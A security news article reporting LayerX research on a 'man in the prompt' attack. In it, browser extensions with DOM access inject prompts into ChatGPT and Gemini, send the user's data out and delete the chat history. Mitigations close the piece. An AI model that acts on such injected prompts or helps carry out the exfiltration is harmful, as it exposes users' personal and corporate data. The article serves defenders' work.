An innovative prompt injection attacker can steal your data using nothing but a browser extension.
Browser security vendor LayerX published research today dedicated to an attack it discovered that represents a “weakness” in how browser instances of AI tools interact with the Web browser itself. Called “man in the prompt,” the exploit relies on the fact that for many generative AI/LLM-powered tools, the input field is part of the page’s Document Object Model (DOM), an API that Web browsers use to render documents.
Because browser extensions can have high permissions in a Web browser, and because they also rely on the DOM, LayerX said, “any browser extension with scripting access to the DOM can read from, or write to, the AI prompt directly.” That’s where the opportunity for attackers come in.
“LayerX’s research shows that any browser extension, even without any special permissions, can access the prompts of both commercial and internal LLMs and inject them with prompts to steal data, exfiltrate it, and cover their tracks,” according to the research, which was shared exclusively with Dark Reading.
Though it is not a vulnerability involving a specific model or product, LayerX claimed that multiple models including ChatGPT, Gemini, Deepseek, Copilot, and Claude are susceptible to two versions of the attack.
Man in the Prompt: How It Works
Attackers can execute the exploit in multiple ways, such as via a browser extension installed post-exploitation, an extension unwittingly installed via a social engineering method like phishing or typosquatting, or an extension the user already has installed that the attacker purchased access to and then poisoned.
In this last case, no action on the part of the user is necessary. This doesn’t appear to be a far-fetched scenario either, as Chrome Web Store (to name one injection) has a whole class of extensions that include prompt writing, reading, and editing as part of their feature sets.
Once the attacker has access to an extension inside a user’s vulnerable browser, the extension can communicate with generative AI (GenAI) tools, inject prompts, and read them. The most obvious risk here is data leakage and theft as, depending on the tool, an attacker could gain access to personally identifiable data, folder and file contents, and more.
Internal LLMs are particularly exposed because they, as the research noted, “are often trained or augmented with highly sensitive, proprietary organizational data,” such as legal documents, internal communications, source code, intellectual property, financial forecasts, corporate strategy, and so on.
These internal LLMs also have a high level of trust from a security perspective, as well as fewer query guardrails.
The research includes proof-of-concept (PoC) exploits for both ChatGPT and Gemini.
In the former, the user installed a compromised extension with no permissions enabled. A command-and-control (C2) server sent a query to the extension, which opens a background tab and queries ChatGPT. The results are exfiltrated to an external log, and the extension deletes relevant chat history.
The Gemini PoC relies on the fact that, by default, Gemini has access to all data accessible to the end user in Google Workspace, like email, documents, contacts, and all shared files and folders the user has permissions for. The Gemini integration into Workspace also includes a sidebar in Google apps, allowing the user to automate certain functions.
“The new Gemini integration is implemented directly within the page as added code on top of the existing page. It modifies and directly writes to the web application’s Document Object Model (DOM), giving it control and access to all functionality within the application,” LayerX said in its research.
“LayerX has found that the way this integration is implemented, any browser extension, without any special extension permissions, can interact with the prompt, and inject prompts into it. As a result, practically any extension can access the Gemini sidebar prompt and query it for any data it desires,” the researchers added.
Risk and Mitigation
LayerX CEO and co-founder Or Eshed tells Dark Reading he has “no doubt” attackers will exploit this attack. “The potential use cases and scenarios for this attack are infinite,” he says. “It’s a very low-hanging fruit.”
But while the potential for exploitation is high, and while traditional security tools don’t have visibility into DOM-level interactions, Or explains that on the defender side, securing a browser is “manageable and achievable to secure with either browser protection or more secure AI applications.”
LayerX said in its research that defenders should monitor DOM interactions within their GenAI tools via listeners or webhooks, and also block risky extensions based on behavioral risk rather than allowlists. Organizations should also regularly audit the extensions in their environment, as well as the permissions those extensions have.